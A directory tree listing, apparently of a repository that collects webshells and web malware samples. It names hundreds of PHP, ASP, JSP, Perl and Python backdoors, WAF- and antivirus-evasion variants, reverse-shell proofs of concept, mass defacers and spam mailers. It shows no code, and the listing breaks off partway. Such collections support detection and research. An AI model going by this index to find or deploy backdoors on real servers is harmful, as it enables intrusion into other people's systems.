│ ├── 2022-09-0901.php
│ ├── 20220206.php
│ ├── 20220207.php
│ ├── 20220213_04.php
│ ├── 20220213_05.php
│ ├── 20220213_06.php
│ ├── 2023-04-08.js
│ ├── 2023-04-08.php
│ ├── 404.php
│ ├── 404.php.no.txt
│ ├── 404.php.txt
│ ├── 5678.php
│ ├── Ani-Shell/
│ │ ├── Ani-Shell.php
│ │ └── README.txt
│ ├── AntSword_2021-03-06.php
│ ├── BNKQbAKQ.txt
│ ├── Crack8_PHP.txt
│ ├── DAws.md
│ ├── How To Exploit PHP Remotely To Bypass Filters & WAF Rules.md
│ ├── MemShellForPHP/
│ │ ├── memWebshell.php
│ │ ├── readme.md
│ │ └── test.txt
│ ├── PHPshell/
│ │ ├── Antichat Shell v1.3/
│ │ │ └── Antichat Shell v1.3.php
│ │ ├── Crystal/
│ │ │ └── Crystal.php
│ │ ├── Dx/
│ │ │ └── Dx.php
│ │ ├── MySQL Web Interface Version 0.8/
│ │ │ └── MySQL Web Interface Version 0.8.php
│ │ ├── Mysql interface v1.0/
│ │ │ └── Mysql interface v1.0.php
│ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/
│ │ │ └── NIX REMOTE WEB-SHELL.php
│ │ ├── NetworkFileManagerPHP/
│ │ │ └── NetworkFileManagerPHP.php
│ │ ├── PH Vayv/
│ │ │ └── PH Vayv.php
│ │ ├── PHP Shell/
│ │ │ └── PHP Shell.php
│ │ ├── PHPRemoteView/
│ │ │ └── PHPRemoteView.php
│ │ ├── SnIpEr_SA Shell/
│ │ │ └── SnIpEr_SA Shell.php
│ │ ├── c99/
│ │ │ └── c99.php
│ │ ├── c99_PSych0/
│ │ │ └── c99_PSych0.php
│ │ ├── c99_locus7s/
│ │ │ └── c99_locus7s.php
│ │ ├── c99_w4cking/
│ │ │ └── c99_w4cking.php
│ │ ├── c99shell/
│ │ │ └── c99shell.php
│ │ ├── ctt_sh/
│ │ │ └── ctt_sh.php
│ │ ├── gfs_sh/
│ │ │ └── gfs_sh.php
│ │ ├── iMHaPFtp/
│ │ │ └── iMHaPFtp.php
│ │ ├── nstview/
│ │ │ └── nstview.php
│ │ ├── r57shell/
│ │ │ └── r57shell.php
│ │ ├── r57shell127/
│ │ │ └── r57shell127.php
│ │ ├── zacosmall/
│ │ │ └── zacosmall.php
│ │ ├── 【C99madShell v. 3.0】/
│ │ │ └── smowu.php
│ │ ├── 【EgY_SpIdEr ShElL V2】/
│ │ │ └── EgY_SpIdEr ShElL V2.php
│ │ ├── 【PHPJackal v1.5】/
│ │ │ └── PHPJackal v1.5.php
│ │ ├── 【PHPJackal】/
│ │ │ └── PHPJackal.php
│ │ ├── 【Shell [ci] .Biz was here】/
│ │ │ └── Shell [ci] .Biz was here.php
│ │ ├── 【c99_madnet】/
│ │ │ ├── smowu.php
│ │ │ └── 密码.txt
│ │ ├── 【ironshell】/
│ │ │ ├── ironshell.php
│ │ │ └── 密码.txt
│ │ ├── 【phpshell-2.1】/
│ │ │ ├── INSTALL
│ │ │ ├── config.php
│ │ │ ├── phpshell3.php
│ │ │ ├── pwhash.php
│ │ │ ├── style.css
│ │ │ └── 备注.txt
│ │ ├── 【r57_Mohajer22】/
│ │ │ └── r57_Mohajer22.php
│ │ ├── 【r57_iFX】/
│ │ │ └── r57_iFX.php
│ │ ├── 【r57_karta】/
│ │ │ └── r57_kartal.php
│ │ └── 【r57】/
│ │ └── r57.php
│ ├── PHP简单小马源码.php
│ ├── Phpspy 2010 身份验证绕过漏洞
│ ├── Phpspy 2011 继续身份验证绕过漏洞
│ ├── README.md
│ ├── Resume.php.txt
│ ├── SaiProbe/
│ │ └── SaiProbe_v1.0.php
│ ├── Shu1337.php
│ ├── YAPS/
│ │ ├── readme.md
│ │ └── yaps.php
│ ├── YXNzZXJ0YWE.php
│ ├── admine21.txt
│ ├── admine21_decode.php
│ ├── aioshell.php
│ ├── angel大马.php
│ ├── array_intersect_uassoc-filename-last-char-must-be-r.php
│ ├── array_intersect_uassoc-filename-last-char-must-be-s.php
│ ├── array_intersect_uassoc-headers-accept-r.php
│ ├── array_intersect_ukey-cookie-ass.php
│ ├── array_intersect_ukey.php
│ ├── array_udiff_assoc.php
│ ├── ass.php
│ ├── asw.php
│ ├── b374k/
│ │ ├── README.md
│ │ ├── b374k-2.2.min.php
│ │ ├── b374k-2.2.poly.php
│ │ ├── b374k-2.3.min.php
│ │ ├── b374k-2.3.poly.php
│ │ ├── b374k-2.4.min.php
│ │ ├── b374k-2.4.poly.php
│ │ ├── b374k-2.5.php
│ │ ├── b374k-2.6.php
│ │ ├── b374k-2.7.php
│ │ ├── b374k-2.8.php
│ │ ├── b374k-3.2.2.min.php
│ │ ├── b374k-3.2.2.php
│ │ ├── b374k-3.2.3.min.php
│ │ ├── b374k-3.2.3.php
│ │ ├── mini_b374k
│ │ └── source/
│ │ ├── b374k-2.2.php
│ │ ├── b374k-2.3.php
│ │ ├── b374k-2.4.php
│ │ ├── b374k-2.5.source.php
│ │ ├── b374k-2.6.source.php
│ │ ├── b374k-2.7.source.php
│ │ ├── b374k-2.8.source.php
│ │ └── b374k-3.2.2.php
│ ├── bat.php
│ ├── bat_2.7.php
│ ├── bat_b4tm4n.php
│ ├── biantai.php
│ ├── blackbin/
│ │ ├── 404super.php
│ │ └── v1/
│ │ ├── code.php
│ │ ├── dev_core.php
│ │ ├── make2.php
│ │ └── readme.md
│ ├── bypass-dog-2020-01-30.php
│ ├── bypass-safedog-2016-08-29.php
│ ├── bypass-waf-2015-06-10-01.php
│ ├── bypass-waf-2015-06-16-01.php
│ ├── bypass-waf-2015-06-16-02.php
│ ├── bypass-waf-2015-06-16-03.php
│ ├── bypass-with-base32.php
│ ├── bypass2021-01-04-01.php
│ ├── carbylamine.txt
│ ├── conflg1.php
│ ├── cotent01.md
│ ├── create_code_with_xor.py
│ ├── create_webshell_with_py.py
│ ├── cvwfzthj.php
│ ├── error52.php
│ ├── fbi.php
│ ├── forward_static_call_array-referer-ass.php
│ ├── general.php
│ ├── get1.php
│ ├── getConstants.php
│ ├── getConstants2.php
│ ├── ghost.php
│ ├── ghost_source.php
│ ├── gif.php
│ ├── gzismexv.php
│ ├── h6ss.php
│ ├── icesword.php
│ ├── indrajith-2.0.txt
│ ├── indrajith.txt
│ ├── itsec.php
│ ├── job.php.txt
│ ├── koplak_php%3Bme.txt
│ ├── lnc.php
│ ├── lpl38-com-php.txt
│ ├── mof提权带回显带清楚命令版本.php
│ ├── no2.php
│ ├── oi.php.decode.txt
│ ├── oi.php.txt
│ ├── other-decode.php
│ ├── other.php
│ ├── p2j/
│ │ ├── PHP reflection.php.txt
│ │ ├── PHP反射后门.php.txt
│ │ └── Readme.md
│ ├── pHp一句话扫描脚本程序.php
│ ├── pas/
│ │ ├── pas.php
│ │ └── password.txt
│ ├── pass-waf-2014-10-19.php
│ ├── php-extension-backdoor.md
│ ├── php-sh/
│ │ ├── client.py
│ │ └── server.php
│ ├── php-xor.md
│ ├── php-xor.php.md
│ ├── php1.php
│ ├── php7.1_bypass.php
│ ├── php_niu_1.php
│ ├── php_niu_2.php
│ ├── php_webshell.py
│ ├── phpkit-0.1a/
│ │ ├── README
│ │ ├── odd.php
│ │ └── phpkit.py
│ ├── phpkit-0.2a/
│ │ ├── CHANGELOG
│ │ ├── README
│ │ ├── odd.php
│ │ ├── phpkit.py
│ │ └── upload.py
│ ├── phpkit-1.0/
│ │ ├── README.txt
│ │ ├── odd.php
│ │ └── phpkitcli.py
│ ├── phpshell.php.txt
│ ├── phpspy/
│ │ ├── 2008.php
│ │ ├── 2009lite.php
│ │ ├── 2009mssql.php
│ │ ├── 2011.php
│ │ ├── 2013加密.php
│ │ ├── 2013未加密.php
│ │ ├── 2014phpspy.php
│ │ ├── phpspy2010.php
│ │ ├── phpspy_2005_full.php
│ │ ├── phpspy_2005_lite.php
│ │ └── phpspy_2006.php
│ ├── phpwebshell pass by waf for share.md
│ ├── php一句话
│ ├── php一句话02.txt
│ ├── php版iisspy.php
│ ├── poison.php
│ ├── priv8-2012-bypass-shell.php.txt
│ ├── priv95.php.txt
│ ├── r00ts php大马.php
│ ├── reverseshell-poc.txt
│ ├── s.php.txt
│ ├── session91.php
│ ├── shell.php
│ ├── shell.php.txt
│ ├── silic.php
│ ├── simple_2022_08_15.php
│ ├── spy.php
│ ├── supers.php
│ ├── sure.php_.txt
│ ├── system2022-08-22-2.php
│ ├── system2022-08-22-3.php
│ ├── system2022-08-22-4.php
│ ├── system2022-08-22.php
│ ├── tank96a/
│ │ ├── getcode.php
│ │ ├── readme.md
│ │ └── webshell.php
│ ├── test.php
│ ├── tiamo.php.decode.txt
│ ├── tiamo.php.txt
│ ├── tips.md
│ ├── tk.php
│ ├── tk_dencode_1.php
│ ├── tw/
│ │ └── 2015-09-12.md
│ ├── twitter/
│ │ ├── 1n73ction.php
│ │ ├── 404 shell code.php
│ │ ├── adminer-4.2.4.php
│ │ ├── bh.php
│ │ ├── bukapalapak.php
│ │ ├── gamestopceker.php
│ │ ├── mailer.php
│ │ ├── promailerv2.php
│ │ ├── qyt0dHv1.php
│ │ └── v4xGus6X.php
│ ├── ucen.php
│ ├── upsi1on.php
│ ├── w.php
│ ├── webshell-123.php
│ ├── webshell-cnseay-x.php
│ ├── webshell-cnseay02-1.php
│ ├── webshell-without-alphanumeric2.php
│ ├── webshell免杀-提升兼容性.html
│ ├── wloymzuk.php
│ ├── wp_backup.php
│ ├── wpes/
│ │ ├── readme.md
│ │ └── wpes-v0.2.php
│ ├── wsb/
│ │ ├── ReadMe.txt
│ │ ├── idc.php
│ │ └── wsb.pl
│ ├── wso/
│ │ ├── WSO_4_0_5.php
│ │ ├── WSO_base64.php
│ │ ├── readme.md
│ │ ├── wso-4.1.3.php
│ │ ├── wso-4.2.0.php
│ │ ├── wso-4.2.1.php
│ │ ├── wso-4.2.2.php
│ │ ├── wso-4.2.3.php
│ │ ├── wso-4.2.4.php
│ │ ├── wso-4.2.5.php
│ │ ├── wso.php
│ │ ├── wso2.php
│ │ ├── wso2_pack.php
│ │ └── wso_404.php
│ ├── wso-ng/
│ │ ├── wso-ng.php
│ │ └── wsoExGently.php
│ ├── wso2.5.1.php
│ ├── wso2.php.txt
│ ├── xd20.txt
│ ├── xd30.txt
│ ├── xiao.php.txt
│ ├── xiaom.php
│ ├── xslt.php
│ ├── xw.php
│ ├── yyihacker.php.txt
│ ├── zone_hackbar.php
│ ├── zone_hackbar_beutify.php
│ ├── zone_hackbar_other.php
│ ├── zw.php
│ ├── zxc/
│ │ ├── .v.php
│ │ ├── README.md
│ │ ├── bypass403.php
│ │ ├── kyo.php
│ │ └── shell.php
│ ├── 一个过安全狗的pHp一句话.php
│ ├── 一句话2015-06-10-01.php
│ ├── 一句话2015-06-10-02.php
│ ├── 一句话2015-06-10-03.php
│ ├── 一句话木马的精简史.md
│ ├── 不带引号的pHp一句话.php
│ ├── 另类PHP一句话小马.md
│ ├── 国外某论坛不含Get,Post的pHp一句话.php
│ ├── 极其隐蔽的pHp小马穿插在正常页面中.php
│ ├── 某变异pHp一句话木马.php
│ ├── 牛X的pHp一句话.php
│ ├── 过各大杀软的pHp一句话.php
│ └── 非常规的pHp一句话木马.php
├── php_niu_3.php
├── pl/
│ ├── Silic Group_cgi.pl
│ ├── Silic Group_readme.txt
│ ├── WebShell.cgi.pl
│ ├── exim.pl
│ ├── hmass (priv8 mass defacor).pl
│ ├── inc.pl
│ ├── ka0tic.pl
│ ├── lurm_safemod_on.cgi.pl
│ ├── perlweb_shell.pl
│ ├── perlwebshell-0.1/
│ │ ├── AUTHORS
│ │ ├── COPYING
│ │ ├── ChangeLog
│ │ ├── INSTALL
│ │ ├── README
│ │ └── perlwebshell.cgi
│ ├── pps-pl/
│ │ ├── pps-v1.0.pl
│ │ ├── pps-v3.0.pl
│ │ ├── pps-v3.5.pl
│ │ └── pps-v4.0.pl
│ ├── rcpexp.pl
│ ├── remot shell.pl
│ ├── telnet.cgi.pl
│ └── telnet.pl
├── proxy.py
├── py/
│ ├── Phyton Shell.py
│ ├── cgi-python.py
│ ├── d00r_py3.py
│ ├── darkBC.py.txt
│ ├── python flask 内存马.md
│ ├── sctp_reverse.py.txt
│ └── smtpd.py
├── rec/
│ └── readme.md
├── upsi1on/
│ └── webshell/
│ └── sungux/
│ ├── decrypt.php
│ └── encrypt.php
├── web-malware-collection-13-06-2012/
│ ├── ASP/
│ │ ├── 3fexe.txt
│ │ ├── ASpy.txt
│ │ ├── EFSO.txt
│ │ ├── ELMALISEKER Backd00r.asp
│ │ ├── NTDaddy.v1.9.txt
│ │ ├── RHTools.v1.5-BETA.txt
│ │ ├── RemExp.asp
│ │ ├── Server Variables.asp
│ │ ├── aspSH.v1.txt
│ │ ├── aspxSH.txt
│ │ ├── aspxshell.aspx.txt
│ │ ├── aspydrv.asp
│ │ ├── aspydrv.txt
│ │ ├── cmd.asp
│ │ ├── cmd.aspx
│ │ ├── cmdexec.aspx
│ │ ├── elmaliseker.asp
│ │ ├── filesystembrowser.aspx
│ │ ├── fileupload.aspx
│ │ ├── list.asp
│ │ ├── ntdaddy.asp
│ │ ├── spexec.aspx
│ │ ├── sql.aspx
│ │ ├── tool.asp
│ │ ├── toolaspshell.txt
│ │ ├── up.asp
│ │ ├── zehir.asp
│ │ ├── zehir.txt
│ │ ├── zehir4.asp
│ │ └── zehir4.txt
│ ├── JSP/
│ │ ├── JspWebshell 1.2.jsp
│ │ ├── browser.jsp
│ │ ├── cmd.jsp
│ │ ├── cmd_win32.jsp
│ │ ├── jspShell.jsp
│ │ ├── jspbd.jsp
│ │ ├── list.jsp
│ │ ├── up.jsp
│ │ └── up_win32.jsp
│ ├── Other/
│ │ ├── cmd.c
│ │ └── cmd.cfm
│ ├── PHP/
│ │ ├── 150.php
│ │ ├── 27.9.txt
│ │ ├── 2mv2.txt
│ │ ├── 404.php
│ │ ├── 404.txt
│ │ ├── Ajax_PHP Command Shell.txt
│ │ ├── Ajax_PHP Command Shell.txt.1
│ │ ├── Ani-Shell.php
│ │ ├── AntiSecShell.v0.5.txt
│ │ ├── Antichat Shell v1.3.php
│ │ ├── Antichat Shell v1.3.txt
│ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
│ │ ├── Backdoor.PHP.Agent.php
│ │ ├── Crystal.txt
│ │ ├── CrystalShell v.1.txt
│ │ ├── Cyber Shell (v 1.0).php
│ │ ├── DTool Pro.txt
│ │ ├── Dive Shell 1.0 - Emperor Hacking Team.php
│ │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt
│ │ ├── Dx.txt
│ │ ├── DxShell.1.0.txt
│ │ ├── FaTaLisTiCz_Fx.txt
│ │ ├── Fx29Sh.3.2.12.08.txt
│ │ ├── G5.php
│ │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt
│ │ ├── GNY.Shell.v1.1.txt
│ │ ├── KAdot Universal Shell v0.1.6.php
│ │ ├── KAdot Universal Shell v0.1.6.txt
│ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
│ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
│ │ ├── Macker's Private PHPShell.php
│ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt
│ │ ├── MySQL Web Interface Version 0.8.php
│ │ ├── MySQL Web Interface Version 0.8.txt
│ │ ├── Mysql interface v1.0.txt
│ │ ├── NCC-Shell.txt
│ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php
│ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
│ │ ├── NetworkFileManagerPHP.txt
│ │ ├── PH Vayv.txt
│ │ ├── PHANTASMA.txt
│ │ ├── PHP Shell.txt
│ │ ├── PHPJackal.txt
│ │ ├── PHPRemoteView.txt
│ │ ├── PHPSPY.php
│ │ ├── Php_Backdoor.txt
│ │ ├── Private-i3lue.php
│ │ ├── Private-i3lue.txt
│ │ ├── RedhatC99 [login=redhat-pass=root]
│ │ ├── Rootshell.v.1.0.txt
│ │ ├── Safe mode breaker.php
│ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
│ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
│ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
│ │ ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.txt
│ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php
│ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
│ │ ├── SimShell 1.0 - Simorgh Security MGZ.php
│ │ ├── SimShell 1.0 - Simorgh Security MGZ.txt
│ │ ├── SnIpEr_SA Shell.txt
│ │ ├── Sst-Sheller.php
│ │ ├── SyRiAn.Sh3ll.v7.txt
│ │ ├── WinX Shell.php
│ │ ├── WinX Shell.txt
│ │ ├── Worse Linux Shell.php
│ │ ├── Worse Linux Shell.txt
│ │ ├── a.php
│ │ ├── aZRaiLPhp v1.0.php
│ │ ├── aZRaiLPhp v1.0.txt
│ │ ├── accept_language.txt
│ │ ├── acid.php
│ │ ├── antichat.php
│ │ ├── arabicspy.php
│ │ ├── b37.php
│ │ ├── b374k.v1.txt
│ │ ├── backupsql.txt
│ │ ├── bdotw44shell.txt
│ │ ├── bug (1).php
│ │ ├── bug.php
│ │ ├── bypass.txt
│ │ ├── c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php
│ │ ├── c100.txt
│ │ ├── c37.php
│ │ ├── c66.php
│ │ ├── c99-bd.txt
│ │ ├── c99-shadows-mod.php
│ │ ├── c99.php
│ │ ├── c99.txt
│ │ ├── c993.txt
│ │ ├── c99_2.txt
│ │ ├── c99_PSych0.php
│ │ ├── c99_locus7s.txt
│ │ ├── c99_madnet.txt
│ │ ├── c99_w4cking.txt
│ │ ├── c99madshell.php
│ │ ├── c99shell.php
│ │ ├── c99ud.txt
│ │ ├── c99unlimited.txt
│ │ ├── c99v2.php
│ │ ├── cbfphpsh.txt
│ │ ├── cihshell_fix.php
│ │ ├── cmd.php
│ │ ├── cmd.txt
│ │ ├── co.php
│ │ ├── connect-back.php.txt
│ │ ├── cpanel.txt
│ │ ├── cpg_143_incl_xpl.php
│ │ ├── ctt_sh.txt
│ │ ├── cybershell.txt
│ │ ├── dC3 Security Crew Shell PRiV.txt
│ │ ├── dC3.Security.Crew.Shell.priv8.txt
│ │ ├── egy.txt
│ │ ├── erne.txt
│ │ ├── ex0shell.txt
│ │ ├── fx.txt
│ │ ├── g00nshell-v1.3.txt
│ │ ├── g00nv13.php
│ │ ├── gfs_sh.txt
│ │ ├── h4ntu shell [powered by tsoi].php
│ │ ├── h4ntu shell [powered by tsoi].txt
│ │ ├── hkrkoz.php
│ │ ├── iMHaPFtp.txt
│ │ ├── ironshell.txt
│ │ ├── isko.txt
│ │ ├── iskorpitx.txt
│ │ ├── itsecteam.v2.1.txt
│ │ ├── itsecteam_shell.php
│ │ ├── jHn.php
│ │ ├── knullsh.txt
│ │ ├── kolang-bypass.txt
│ │ ├── kral.txt
│ │ ├── lamashell.txt
│ │ ├── list.php
│ │ ├── load_shell.txt
│ │ ├── locus.txt
│ │ ├── log.txt
│ │ ├── lolipop.txt
│ │ ├── lostDC.txt
│ │ ├── ly0kha.txt
│ │ ├── matamu.txt
│ │ ├── megabor.txt
│ │ ├── metaslsoft.php
│ │ ├── mini.j0s_ali.j0e.v27.9.txt
│ │ ├── myshell.txt
│ │ ├── mysql.txt
│ │ ├── mysql_tool.txt
│ │ ├── mysqlwebsh.php
│ │ ├── newsh.php
│ │ ├── nshell.txt
│ │ ├── nst.txt
│ │ ├── nstview.txt
│ │ ├── p0isoN.sh3ll.txt
│ │ ├── pHpINJ.txt
│ │ ├── php-backdoor.txt
│ │ ├── php-include-w-shell.txt
│ │ ├── phpjackal1.3.txt
│ │ ├── phpshell.php
│ │ ├── priv8-2012-bypass-shell.txt
│ │ ├── pws.txt
│ │ ├── r57-bd.txt
│ │ ├── r57.1.4.0.php
│ │ ├── r57.mod-bizzz.shell.txt
│ │ ├── r57.php
│ │ ├── r57.txt
│ │ ├── r57142.php
│ │ ├── r57_Mohajer22.txt
│ │ ├── r57_iFX.txt
│ │ ├── r57_kartal.txt
│ │ ├── r57shell1.40.txt
│ │ ├── r57shell2.0.txt
│ │ ├── redcod.php
│ │ ├── remview_fix.php
│ │ ├── rootshell.txt
│ │ ├── ru24_post_sh.txt
│ │ ├── s72 Shell v1.1 Coding.php
│ │ ├── s72 Shell v1.1 Coding.txt
│ │ ├── safe0ver.txt
│ │ ├── shellzx.txt
│ │ ├── simattacker.txt
│ │ ├── simple-backdoor.txt
│ │ ├── simple_cmd.txt
│ │ ├── small.txt
│ │ ├── sniper.txt
│ │ ├── soldierofallah.txt
│ │ ├── sosyete.txt
│ │ ├── spygrup.txt
│ │ ├── sql.php
│ │ ├── stres.txt
│ │ ├── ugdevil.v2.0.txt
│ │ ├── up.php
│ │ ├── uploader.txt
│ │ ├── wso.v2.5.txt
│ │ ├── wso2.5.php
│ │ ├── wso2.php
│ │ ├── x0rg.byp4ss.txt
│ │ └── zacosmall.txt
│ ├── PL/
│ │ ├── Perl Web Shell by RST-GHC.pl
│ │ ├── cgitelnet.txt
│ │ ├── cmd.pl
│ │ ├── dc.pl
│ │ ├── list.pl
│ │ └── up.pl
│ └── README.md
├── webshell-free/
│ ├── README.md
│ └── php/
│ └── Exception.php
├── wsMemShell/
│ ├── Godzilla.java
│ ├── WsCmd.java
│ ├── readme.md
│ ├── weblogic/
│ │ ├── wsAddAllContainer.jsp
│ │ └── wscmd.jsp
│ ├── wscmd.jsp
│ └── wsproxy.jsp
├── www-7jyewu-cn/
│ ├── DOC_ZIBSZXBIEG.php
│ ├── README.md
│ ├── UnKnown 高级Vip防删收费版 (1).asp
│ ├── UnKnown 高级Vip防删收费版.asp
│ ├── aspmuma.asp
│ ├── aspx经典大马.aspx
│ ├── asp小马.asp
│ ├── 不灭之魂2013改进版本.asp
│ ├── 不灭之魂2014改进版本.asp
│ ├── 传说中的草泥马4.0 (1).asp
│ ├── 传说中的草泥马4.0.asp
│ ├── 免杀php大马.php
│ ├── 国外免杀PHP大马_未翻译.php
│ ├── 国外免杀php大马.php
│ ├── 土司搞基asp大马 (1).asp
│ ├── 土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp
│ ├── 土司搞基asp大马.asp
│ ├── 拿站小助手-经典Asp小马.asp
│ ├── 星外虚拟机提权专用asp大马 (1).asp
│ ├── 星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp
│ ├── 星外虚拟机提权专用asp大马.asp
│ ├── 最新过安全狗- 免杀PHP大马 -.php
│ ├── 法克僵尸大马 (1).asp
│ ├── 法克僵尸大马.asp
│ ├── 火狐NEW WebShell (1).asp
│ ├── 火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp
│ ├── 火狐NEW WebShell.asp
│ ├── 牛逼免杀提权隐藏大马 (1).asp
│ ├── 牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp
│ ├── 牛逼免杀提权隐藏大马.asp
│ ├── 银河舰队大马_2012版.asp
│ ├── 银河舰队大马_2014版.asp
│ └── 非常牛逼的Jsp大马.jsp
├── xakep-shells/
│ ├── ASP/
│ │ ├── Ajan.asp.txt
│ │ ├── CMD.asp.txt
│ │ ├── CmdAsp.asp.txt
│ │ ├── CyberSpy5.Asp.txt
│ │ ├── EFSO_2.asp.txt
│ │ ├── Elmali Seker.asp.txt
│ │ ├── NT Addy.asp.txt
│ │ ├── Rader.asp.txt
│ │ ├── Reader.asp.txt
│ │ ├── RemExp.asp.txt
│ │ ├── Server Variables.asp.txt
│ │ ├── Tool.asp.txt
│ │ ├── Zehir 4.asp.txt
│ │ ├── aspydrv.asp.txt
│ │ ├── cmd-asp-5.1.asp.txt
│ │ ├── elmaliseker.asp.txt
│ │ ├── indexer.asp.txt
│ │ ├── kacak.asp.txt
│ │ ├── klasvayv.asp.txt
│ │ ├── ntdaddy.asp.txt
│ │ └── zehir4.asp.txt
│ ├── CGI/
│ │ ├── WebShell.cgi.txt
│ │ ├── go-shell.cgi.txt
│ │ ├── lurm_safemod_on.cgi.txt
│ │ └── telnet.cgi.txt
│ ├── JSP/
│ │ ├── Java Shell.js.txt
│ │ ├── JspWebshell 1.2.jsp.txt
│ │ ├── cmdjsp.jsp.txt
│ │ ├── jsp-reverse.jsp.txt
│ │ └── jspshall.jsp.txt
│ ├── PERL/
│ │ ├── Asmodeus v0.1.pl.txt
│ │ ├── connectback2.pl.txt
│ │ ├── perlbot.pl.txt
│ │ ├── shellbot.pl.txt
│ │ ├── telnet.pl.txt
│ │ └── telnetd.pl.txt
│ ├── PHP/
│ │ ├── 1.txt
│ │ ├── 2008.php.php.txt
│ │ ├── Ajax_PHP Command Shell.php.txt
│ │ ├── Antichat Shell v1.3.php.txt
│ │ ├── Antichat Socks5 Server.php.php.txt
│ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt
│ │ ├── Casus15.php.php.txt
│ │ ├── Crystal.php.txt
│ │ ├── DTool Pro.php.txt
│ │ ├── Dive Shell 1.0 - Emperor Hacking Team.php.txt
│ │ ├── Dx.php.php.txt
│ │ ├── DxShell.php.php.txt
│ │ ├── Fatalshell.php.php.txt
│ │ ├── GFS web-shell ver 3.1.7 - PRiV8.php.txt
│ │ ├── KA_uShell.php.php.txt
│ │ ├── KAdot Universal Shell v0.1.6.html.txt
│ │ ├── LOTFREE.php.php.txt
│ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt
│ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.php.txt
│ │ ├── MySQL Web Interface Version 0.8.php.txt
│ │ ├── Mysql interface v1.0.php.txt
│ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt
│ │ ├── NetworkFileManagerPHP.php.txt
│ │ ├── Nshell (1).php.php.txt
│ │ ├── PH Vayv.php.php.txt
│ │ ├── PHANTASMA.php.txt
│ │ ├── PHP Backdoor Connect.pl.php.txt
│ │ ├── PHP Shell.php.php.txt
│ │ ├── PHPRemoteView.php.txt
│ │ ├── Private-i3lue.php.txt
│ │ ├── Rem View.php.php.txt
│ │ ├── Russian.php.php.txt
│ │ ├── STNC.php.php.txt
│ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt
│ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt
│ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt
│ │ ├── SimShell 1.0 - Simorgh Security MGZ.php.txt
│ │ ├── Sincap.php.php.txt
│ │ ├── SnIpEr_SA Shell.php.txt
│ │ ├── SpecialShell_99.php.php.txt
│ │ ├── SsEs.php.php.txt
│ │ ├── Test.php.php.txt
│ │ ├── WinX Shell.html.txt
│ │ ├── Worse Linux Shell.php.txt
│ │ ├── aZRaiLPhp v1.0.php.txt
│ │ ├── a_gedit.php.php.txt
│ │ ├── accept_language.php.txt
│ │ ├── ak74shell.php.php.txt
│ │ ├── antichat.php.php.txt
│ │ ├── backdoor1.php.txt
│ │ ├── backdoorfr.php.txt
│ │ ├── backup.php.php.txt
│ │ ├── backupsql.php.php.txt
│ │ ├── c100.php.txt
│ │ ├── c2007.php.php.txt
│ │ ├── c99madshell_v2.0.php.php.txt
│ │ ├── c99madshell_v2.1.php.php.txt
│ │ ├── c99php.txt
│ │ ├── c99shell_v1.0.php.php.txt
│ │ ├── crystal.txt
│ │ ├── csh.php.php.txt
│ │ ├── ctt_sh.php.php.txt
│ │ ├── cyberlords_sql.php.php.txt
│ │ ├── cybershell.php.php.txt
│ │ ├── dC3 Security Crew Shell PRiV.php.txt
│ │ ├── fuckphpshell.php.txt
│ │ ├── gfs_sh.php.php.txt
│ │ ├── h4ntu shell [powered by tsoi].txt
│ │ ├── hidshell.php.php.txt
│ │ ├── iMHaPFtp.php.php.txt
│ │ ├── img.php.php.txt
│ │ ├── ironshell.php.txt
│ │ ├── lamashell.php.txt
│ │ ├── load_shell.php.php.txt
│ │ ├── mailer3.php.php.txt
│ │ ├── matamu.php.txt
│ │ ├── myshell.php.php.txt
│ │ ├── mysql.php.php.txt
│ │ ├── mysql_shell.php.txt
│ │ ├── mysql_tool.php.php.txt
│ │ ├── network.php.php.txt
│ │ ├── nfm.php.php.txt
│ │ ├── ngh.php.php.txt
│ │ ├── nixrem.php.php.txt
│ │ ├── nshell.php.php.txt
│ │ ├── nst.php.php.txt
│ │ ├── nstview.php.php.txt
│ │ ├── pHpINJ.php.php.txt
│ │ ├── php-backdoor.php.txt
│ │ ├── php-include-w-shell.php.txt
│ │ ├── phpbackdoor15.php.txt
│ │ ├── phpjackal.php.txt
│ │ ├── phpshell17.php.txt
│ │ ├── phvayv.php.php.txt
│ │ ├── phvayvv.php.php.txt
│ │ ├── predator.php.php.txt
│ │ ├── pws.php.php.txt
│ │ ├── r57 Shell.php.php.txt
│ │ ├── r57.php.php.txt
│ │ ├── r577.php.php.txt
│ │ ├── r57shell.php.php.txt
│ │ ├── rootshell.php.txt
│ │ ├── rst_sql.php.php.txt
│ │ ├── ru24_post_sh.php.php.txt
│ │ ├── s.php.php.txt
│ │ ├── s72 Shell v1.1 Coding.html.txt
│ │ ├── s72_shell.txt
│ │ ├── sh.php.php.txt
│ │ ├── shankar.php.php.txt
│ │ ├── shell.php.php.txt
│ │ ├── simple-backdoor.php.txt
│ │ ├── simple_cmd.html.txt
│ │ ├── small.php.php.txt
│ │ ├── sniper_sa_shell.txt
│ │ ├── spy.php.php.txt
